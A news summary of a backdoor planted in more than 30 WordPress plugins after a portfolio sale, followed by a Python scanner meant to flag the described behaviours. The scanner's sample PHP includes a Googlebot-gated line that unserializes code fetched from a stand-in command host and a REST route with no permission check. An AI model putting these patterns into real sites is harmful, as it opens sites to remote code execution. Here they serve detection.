WordPress.org removed more than 30 plugins from its directory after identifying a backdoor that affected installations across thousands of websites. The plugins were part of a portfolio known as “Essential Plugin,” a collection developed over several years and used to extend common site features such as sliders, galleries, and widgets.
The sequence of events began with a public sale of the portfolio in 2025. After the transfer, updates introduced code that appeared routine in changelogs but later proved to include a hidden backdoor.
That code remained inactive for months, blending into normal plugin behavior, before activating in early April 2026 and initiating the distribution of unauthorized payloads to sites where the plugins were installed.
Why It Matters: This incident shows how control over widely distributed software can translate into access across thousands of systems, especially when ownership changes are not visible and do not trigger additional review. It also highlights a gap between how software is trusted and how it is governed, where routine updates can introduce risk without clear signals to those responsible for security and operations.
- Timeline Links Ownership Change and Activation: The plugins had been maintained for years by their original developers before the portfolio was sold. After the acquisition, a new version introduced additional code under the guise of a routine compatibility update. In reality, this update added a backdoor in August 2025, which stayed inactive until April 5–6, 2026, when it was triggered.
- Backdoor Design Enabled Controlled Execution Through Standard Functions: The malicious code relied on standard PHP functions like “file_get_contents()” and “unserialize()” to pull in instructions from an external server and interpret them. It also exposed a REST API endpoint without any permission checks. In practice, this meant the attacker could send data to the site and have it executed as code, with full control over what ran and how it behaved.
- Infection Path Extended Outside the Plugin Itself: Once activated, the plugins pulled down an additional file that was made to look like a legitimate WordPress component. That file then inserted a large block of PHP code into “wp-config.php”. Because this file runs on every request and usually isn’t touched by plugin updates, the injected code stayed in place even after the plugin itself was disabled or updated.
- Behavior Was Tailored to Reduce Visibility During Normal Use: The injected code served spam links and redirects in a way that was hard to spot, appearing only to search engine crawlers like Googlebot. Someone visiting the site normally would see nothing unusual. The system that delivered instructions also used a blockchain-based method to resolve its endpoint, which let the attacker change where the code connected without depending on a fixed domain.
- Platform Response Contained Distribution but Not Full Remediation: WordPress.org closed all affected plugins in one action and pushed forced updates that disabled the communication pathway used by the backdoor. However, these updates did not remove code already written into “wp-config.php”. As a result, affected sites required additional inspection and cleanup. The event also draws attention to the absence of alerts or review processes tied to plugin ownership changes, which allowed the transition and subsequent updates to proceed without additional scrutiny.
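The behaviours listed above (remote fetch plus `unserialize()`, a REST route with no permission check, code appended to `wp-config.php`, crawler-only cloaking) are all things a site owner can triage for in source. The scanner below is an added example written for this summary, not code from the plugins, WordPress.org or the TechCrunch report; its rule names, the `MAX_LINE` threshold and the sample `wp-config.php`/plugin strings (`c2.example.invalid`, `ep/v1`, `ep_sync_handler`) are constructed for illustration.

```python
import re

# Heuristics for the behaviours described above; constructed rules for this
# example, not published signatures for the actual backdoor.
PATTERNS = [
    ("remote_unserialize", re.compile(r"unserialize\s*\(\s*@?\s*file_get_contents\s*\(")),
    ("remote_fetch", re.compile(r"file_get_contents\s*\(\s*['\"]https?://")),
    ("crawler_cloaking", re.compile(r"HTTP_USER_AGENT[^\n]*Googlebot", re.I)),
]
MAX_LINE = 400  # genuine wp-config.php lines are short; a huge one is a typical injected blob

def _call_args(src: str, start: int) -> str:
    """Text between the parentheses of the PHP call that begins at src[start]."""
    i, depth = src.index("(", start), 0
    for j in range(i, len(src)):
        depth += {"(": 1, ")": -1}.get(src[j], 0)
        if depth == 0:
            return src[i + 1:j]
    return src[i + 1:]  # unbalanced call: take the rest of the file

def unprotected_rest_routes(src: str) -> list[int]:
    """Line numbers of register_rest_route() calls that set no permission_callback."""
    return [src.count("\n", 0, m.start()) + 1
            for m in re.finditer(r"register_rest_route\s*\(", src)
            if "permission_callback" not in _call_args(src, m.start())]

def scan_php(src: str) -> list[tuple[int, str]]:
    """Sorted (line_number, rule_name) findings for one PHP source string."""
    findings = []
    for n, line in enumerate(src.splitlines(), 1):
        findings += [(n, name) for name, rx in PATTERNS if rx.search(line)]
        if len(line) > MAX_LINE:
            findings.append((n, "long_opaque_line"))
    findings += [(n, "rest_route_no_permission") for n in unprotected_rest_routes(src)]
    return sorted(findings)

# Constructed samples, not code from the actual plugins: a clean wp-config.php,
# the same file with a crawler-only remote-fetch block appended, and a plugin
# REST route registered without a permission check.
CLEAN_CONFIG = ("<?php\ndefine('DB_NAME', 'wp');\n"
                "/* That's all, stop editing! Happy publishing. */\n"
                "require_once ABSPATH . 'wp-settings.php';\n")
INJECTED_CONFIG = CLEAN_CONFIG + (
    "if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {\n"
    "    $d = unserialize(file_get_contents('http://c2.example.invalid/u'));\n}\n")
OPEN_ROUTE = ("<?php\nadd_action('rest_api_init', function () {\n"
              "    register_rest_route('ep/v1', '/sync', array(\n"
              "        'methods' => 'POST', 'callback' => 'ep_sync_handler'));\n});\n")
```

Run `scan_php()` over `wp-config.php` and every plugin file on a site; a clean install returns no findings, while anything flagged warrants manual review, since the forced updates described above did not clean `wp-config.php`.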
Someone planted backdoors in dozens of WordPress plug-ins used in thousands of websites – TechCrunch